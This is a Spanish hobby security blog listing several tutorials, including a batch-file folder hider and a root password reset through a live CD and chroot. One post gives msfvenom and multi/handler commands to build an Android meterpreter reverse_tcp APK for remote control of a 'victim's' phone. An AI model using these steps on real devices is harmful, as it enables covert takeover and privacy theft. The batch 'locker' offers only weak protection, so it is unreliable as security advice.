Mostrando entradas con la etiqueta tutorial. Mostrar todas las entradas
Mostrando entradas con la etiqueta tutorial. Mostrar todas las entradas

4 dic 2017

Manual -- John The Ripper

AVISO: El presente manual está realizado con fines exclusivamente didácticos, por tanto, no me hago responsable del mal uso que se le pueda dar a este.

Ante todo, hola a todo el mundo! Como dije en su día, todo lo que fuera tocando de seguridad informática y hacking ético lo acabaría compartiendo, pues bueno, aquí os traigo super resumido como realizar un ataque (o análisis) hacia una contraseña con John The Ripper, una aplicación bastante buena para ir practicando.

Como siempre digo, tanto al inicio de la entrada, como en el aviso legal (que lo tienes en la pestaña) como ahora mismo, pongo esto con FINES DIDÁCTICOS, que no se os olvide, o dicho de otra forma, que si la acabáis liando cometiendo un delito yo no me hago responsable de vosotros, ¿vale? Pues tras todo este tochaco, os dejo con el manual.



17 mar 2017

Privatiza tus archivos sin programas

Buenas tardes tirando a noches. Hoy os traigo una guía de como elaborar un "Locker" en Windows de una manera fácil y sin que nos dé problemas a la hora de usarlo pero para entender como hacerlo os responderé a la pregunta:

¿Qué carajo es un locker y para que lo quiero?
Un locker, en palabras que entendería mi yo de hace 8 años sería básicamente "un programa que hace una carpeta y la esconde" así sin más.
Pues entendiendo qué es un locker veremos como hacerlo en cualquier versión de Windows y hasta poder llevarlo en un USB.


  1. Creamos un bloc de notas con el nombre que queramos, es decir, como si quieres llamarlo "Locker" o "Apuntes de Mates" porque escondas ahí lo que sea.
  2. Entramos en ese fichero y copiamos el siguiente tocho que al principio ni un usuario experto entendería (bueno, sí.)
Y SEÑORAS Y SEÑORES ESTE ES NUESTRO TOCHO


cls 
@ECHO OFF 
title Folder Locker 
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK 
if NOT EXIST Locker goto MDLOCKER 
:CONFIRM 
echo Esta Seguro de que quiere proteger la Carpeta(S/N) 
set/p "cho=>" 
if %cho%==S goto LOCK 
if %cho%==s goto LOCK 
if %cho%==n goto END 
if %cho%==N goto END 
echo Venga, una S o una N. 
goto CONFIRM 
:LOCK 
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
echo Tu carpeta ha sido bloqueada
goto End 
:UNLOCK 
echo Venga, ahora la clave
set/p "pass=>" 
if NOT %pass%== (LA CLAVE AQUI) goto FAIL 
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker 
echo Folder Unlocked successfully 
goto End 
AIL 
echo Vuelve a poner la clave que te has equivocado
goto end 
:MDLOCKER 
md Locker 
echo Creaste bien la carpeta privada
goto End 
:End 

Si te estás echando las manos a la cabeza tranquilo, te lo voy a poner fácil.
Una vez que has copiado esto, si te fijas hay una línea en negrita que pone (LA CLAVE AQUI), pues bien, borras incluso los paréntesis, es decir, debe de quedar un espacio después del "=" y antes del "goto".

Ya has hecho lo más difícil, ahora toca guardarlo bien y para ello nos vamos en el bloc de notas arriba a la izquierda, Archivo y luego a "Guardar Como". Seleccionamos "Todos los archivos" y el nombre del archivo será "LoQueQuierasPoner.bat" y lo guardamos. Recalco el .bat porque sino esto no sirve para nada, así de simple.




14 feb 2017

Crear PAYLOAD para Android con Metasploit

En el tutorial de hoy os voy a enseñar como crear un Payload con la aplicación Metasploit integrada en Kali Linux ya que en la distro nos viene más completa que descargándola de Internet.

PAYLOAD
Un payload es un virus o malware que consiste en realizar una acción (normalmente maliciosa) en un dispositivo que esté conectado dentro de nuestra red o fuera de otra. El fin que tiene un payload es tener control total y remoto del dispositivo que se quiera interceptar en cuestión.

METASPLOIT
Metasploit es una herramienta de hacking y pentesting destinada a la explotación y tests de penetración de una manera sencilla. Esta herramienta es conocida por ser como una "navaja suiza" para los hackers y prácticamente todas las distribuciones de Linux lo traen.

¿COMO CREAMOS EL PAYLOAD?

1. Abrimos nuestro sistema operativo de seguridad preferido, luego la aplicación "Metasploit" y escribimos el comando"msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > name.apk"



El comando se divide en varias partes que son:
  • msfvenom -> Es la aplicación donde desarrollamos el payload
  • -p -> Estamos indicando que vamos a realizar un payload
  • android/meterpreter/reverse_tcp -> Es el tipo de payload que necesitamos
  • LHOST -> Es la IP que usará la aplicación para comunicarse con nosotros. Si se va a hacer dentro de la red nuestra el valor es 192.168.1.1 pero si es fuera de nuestra red deberá ser nuestra IP Pública
  • LPORT -> Es el puerto donde se conectará nuestra aplicación. Si la red es interna yo uso el puerto 8080 pero si es en una red exterior deberemos abrir el puerto que deseemos
  • R > name.apk -> Es la ruta donde almacenaremos el payload y con que nombre. La ruta por defecto (cuando ponemos solo el nombre, es la carpeta personal o la de root).
2. Una vez hayamos introducido el payload en el móvil de nuestra víctima ponemos los siguientes comandos:
  • msfconsole ->Iniciamos la aplicación de monitoreo
  • use multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp -> Indicamos cual payload queremos detectar
  • set LHOST xxxx -> Indicamos la IP asignada al payload.
  • set LPORT xxxx -> Indicamos el puerto asignado al payload
  • exploit
Una vez llegados a este punto deberemos tener control total sobre el teléfono.

AVISO: Este tutorial debe ser usado con fines didácticos y en un dispositivo propio ya que sino es un delito de privacidad o en todo caso con el consentimiento del dueño del terminal.

13 feb 2017

Como recuperar clave de ROOT para distros de Linux

Hoy os traigo una guía donde podréis recuperar vuestra clave de superusuario en caso de olvidarla o extraviarla.

Comenzamos iniciando un live CD en la máquina, en mi caso uno de Kali Linux y a continuación abrimos un terminal y escribimos el siguiente comando:


Si os da error poned primero "sudo su" y listo.

Con este comando se nos mostrará una lista de las particiones que hay en la máquina, deberemos anotar el que tiene el asterisco ya que ahí se encuentran los ficheros del sistema.



Una vez obtenida la partición tipeamos los comandos "mkdir /tmp/sdax" y "mount /dev/sdax /tmp/sdax"



El primer comando crea el directorio donde montaremos la partición, el segundo es montarla. La x de sdax la cambiamos por el número de la partición.
Una vez montado la partición entramos en el directorio raíz con el comando "chroot /tmp/sdax" y escribimos el comando "passwd root" para cambiar la clave.


Por último desmontamos la partición con "umount /tmp/sdax" y reiniciamos la máquina.


Cerramos el live CD, retiramos el CD o el USB y reiniciamos la máquina y ponemos el usuario y la clave que escogimos antes.


Con esto tendríamos por recuperada la clave de superusuario. Para cualquier otro usuario el procedimiento es el mismo pero cambiando en comando "passwd root" el root por el nombre de usuario.


25 ene 2017

Distros de Seguridad

A lo largo que escriba este blog vamos a usar varios distros de Linux (Atacantes y Servidores) y Windows (Máquina Atacada y Servidores)
En Windows usaremos todas las distros y Windows Server 2012.
En Linux usaremos las siguientes distros:
Todas las URL’s indicadas son páginas oficiales de las distros que permiten su descarga web.

16 nov 2016

WhatsApp - Como realizar Videollamadas

Como realizar videollamadas en Whatsapp

Hace cuestión de horas se ha lanzado la nueva actualización de WhatsApp la cual incluye la esperada función de videollamadas. Si quieres saber como desbloquear esta opción sigue leyendo la entrada.